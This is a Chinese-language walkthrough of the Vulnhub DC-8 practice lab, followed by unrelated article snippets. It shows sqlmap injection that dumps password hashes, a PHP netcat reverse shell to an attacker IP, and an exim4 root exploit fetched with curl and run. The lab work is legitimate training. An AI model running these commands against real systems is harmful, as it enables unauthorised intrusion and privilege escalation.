Vulnhub靶场 DC-8

目录

一、环境搭建

二、信息收集

1、主机发现

2、指纹识别

三、漏洞复现

1、SQL注入  sqlmap工具

2、dirsearch目录探测

3、反弹shell

4、提权 exim4

5、获取flag

四、总结


一、环境搭建

Vulnhub靶机下载:

官网地址:https://download.vulnhub.com/dc/DC-8.zip

虚拟机:VM虚拟机 或者VBOX 导入即可 

网络环境:NAT

介绍:vulnhub是个提供各种漏洞平台的综合靶场,拿到root权限才可以发现最终的flag。

二、信息收集

1、主机发现

nmap -sP 192.168.176.0/24 

查看服务

nmap -A -p- -v 192.168.176.143

进入网站192.168.176.143

2、指纹识别

 whatweb http://192.168.176.143

三、漏洞复现

1、SQL注入  sqlmap工具

查看网站功能点,发现一处sql交互 存在sql注入漏洞 使用‘等字符,可以判断

sqlmap -u http://192.168.176.143/?nid=1 -dbs  

1.sqlmap -u http://192.168.176.143/?nid=1 -D d7db -tables --batch
2.sqlmap -u http://192.168.176.143/?nid=1 -D d7db -T users -colunms
3.sqlmap -u http://192.168.176.143/?nid=1 -D d7db -T users -C name,pass -dump

admin  $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z john   $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
​​​​​

获取到admin和john密码加密后的密文 然后新建一个pass.txt 把密文放进去使用john 进行破解 密码:turtle

2、dirsearch目录探测

dirsearch -u http://192.168.176.143/ -e php  -x 400,404,503,403 

常用参数如下
-h                查看帮助
-u   xx         目标域名xx
-e   php       扫描网站的类型为php,   类型如php,asp,jsp
-t    40         线程为40,默认为30
-x    400, 404, 503    排除响应码400...,即响应码为这个的不输出到屏幕上
--full-url      输出完成的url模式,这样直接点击就能访问扫描出的结果

http://192.168.176.143/user/login/ 后台地址  登录上面获取到的账号密码

3、反弹shell

发现Content->点击edit->点击WEBFORMS->点击Form settings->点击下拉框选择PHP code

输入反弹shell payload

<?php system ("nc -e /bin/bash 192.168.176.134 7777");?>

代码写入保存后,kali监听7777端口,在Contact Us页面随便输入信息点击Submit后,查看kali已得到shell

使用交互式shell

python -c "import pty; pty.spawn('/bin/bash')"

4、提权 exim4

接下来提权  使用find命令,查找具有suid权限的命令

find / -perm -u=s -type f 2>/dev/null

找到一个exim4 查看一下版本信息

/usr/sbin/exim4 --version

使用searchsploit命令搜索exim相关漏洞

46996.sh拷贝到本地并改名为exp.sh,上传到靶机 执行

kali开启http服务 service apache2 start

将脚本格式设置成符合unix格式 不然会提权失败

cp /usr/share/exploitdb/exploits/linux/local/46996.sh exp.sh

vim exp.sh

set ff=unix

cp exp.sh  /var/www/html

靶机进入tmp目录,wgent\curl下载脚本执行,其他目录 没有权限

weget http://192.168.176.134/exp.sh  命令失败

curl 192.168.176.134/exp.sh -o exp6.sh 读取并重新保存为exp6.sh

chmod 777 / X  给执行权限 

执行文件

./exp6.sh -m netcat

5、获取flag

四、总结

  1. sqlmap进行SQL注入
  2. 常用安全工具的熟悉
  3. exim4命令提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/467791.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

知识图谱 多模态学习 2024 最新综述

知识图谱遇见多模态学习&#xff1a;综述 论文题目&#xff1a;Knowledge Graphs Meet Multi-Modal Learning: A Comprehensive Survey 论文链接&#xff1a;http://arxiv.org/abs/2402.05391 项目地址&#xff1a;https://github.com/zjukg/KG-MM-Survey 备注&#xff1a;55…

读十堂极简人工智能课笔记01_人工智能简史

1. 2400年前 1.1. 希腊罗德岛 1.1.1. 是个神奇的岛屿&#xff0c;以机械发明著称&#xff0c;包括真人大小的、大理石制成的自动机 1.1.2. 早在罗马帝国诞生之前&#xff0c;公元前400多年的希腊就有这样的机器人技术&#xff0c;似乎不可思议 2. 公元前970到前931年 2.1.…

LAXCUS分布式操作系统目标:软件算力入口

英伟达现在的市值相当于整个中国股市&#xff01;说明了什么&#xff1f; AI 大潮下&#xff0c;算力就是生产力&#xff0c;也是未来 20 年一切产业的基础&#xff0c;英伟达已经把住硬件算力入口&#xff0c;LAXCUS 分布式操作系统瞄准软件算力入口&#xff0c;做好了&#…

网安常用的三个攻击方式

1.渗透测试执行标准&#xff08;PTES&#xff09; 渗透测试执行标准由7个部分组成&#xff0c;包括前期交互、情报收集、威胁建模、漏洞分析、渗透利用、后渗透、撰写报告。在中国&#xff0c;渗透测试必须经过授权&#xff0c;否则就违背了网络安全法。前期交互主要指开展渗透…

docker 1:介绍

docker 1&#xff1a;介绍 docker解决哪些问题&#xff1a; 传统APP在安装到不同电脑的时候可能会遇到依赖问题&#xff0c;比如缺少VS 20xx&#xff0c;软件无法运行”的情况。docker使用容器技术将软件 依赖​打包为image包发布&#xff0c;解决了依赖问题。docker有一个官…

腾讯云4核8G服务器性能如何?支持多少用户访问?

腾讯云4核8G服务器支持多少人在线访问&#xff1f;支持25人同时访问。实际上程序效率不同支持人数在线人数不同&#xff0c;公网带宽也是影响4核8G服务器并发数的一大因素&#xff0c;假设公网带宽太小&#xff0c;流量直接卡在入口&#xff0c;4核8G配置的CPU内存也会造成计算…

MySQL简单配置GTID

前期规划 IP地址 角色 系统版本 内核 软件包名称 192.168.2.3 Mysql主服务器 CentOS Stream 9 5.14.0- 381.el9.x86_64 mysql-8.2.0-linux-glibc2.17-x86_64.tar.xz 192.168.2.4 Mysql从服务器 CentOS Stream 9 5.14.0- 381.el9.x86_64 mysql-8.2.0-linux-glibc…

C语言—字符数组(3)

可能不是那么的完整&#xff0c;先凑合看吧&#xff0c;如果我学会如何修改以后&#xff0c;我慢慢回来修改的 1.编写程序实现对两个字符串的连接功能&#xff1b; 法一:不使用strcat函数,写程序直接实现&#xff0c;记得添加结束符&#xff0c;不然程序访问数组时候将变得不…

全国计算机等级考试二级,MySQL数据库考试大纲(2023年版)

基本要求&#xff1a; 1.掌握数据库的基本概念和方法。 2.熟练掌握MySQL的安装与配置。 3.熟练掌握MySQL平台下使用&#xff33;&#xff31;&#xff2c;语言实现数据库的交互操作。 4.熟练掌握 MySQL的数据库编程。 5.熟悉 PHP 应用开发语言&#xff0c;初步具备利用该语言进…

“bound drug/molecule”or “unbound drug/molecule”、molecule shape、sketching是什么?

“bound drug/molecule”or “unbound drug/molecule” For clarity, the following terms will be used throughout this study: “bound drug/molecule” (or “unbound drug/molecule”) refers to the drug/molecule that is bound (or unbound) to proteins [48]. 意思就是…

机器学习:ROC曲线笔记

ROC曲线&#xff08;Receiver Operating Characteristic Curve&#xff09;是一种用于评估二分类模型性能的图形化工具&#xff0c;主要用于展示在不同阈值&#xff08;Threshold&#xff09;下模型的真阳性率&#xff08;True Positive Rate&#xff0c;TPR&#xff09;和假阳…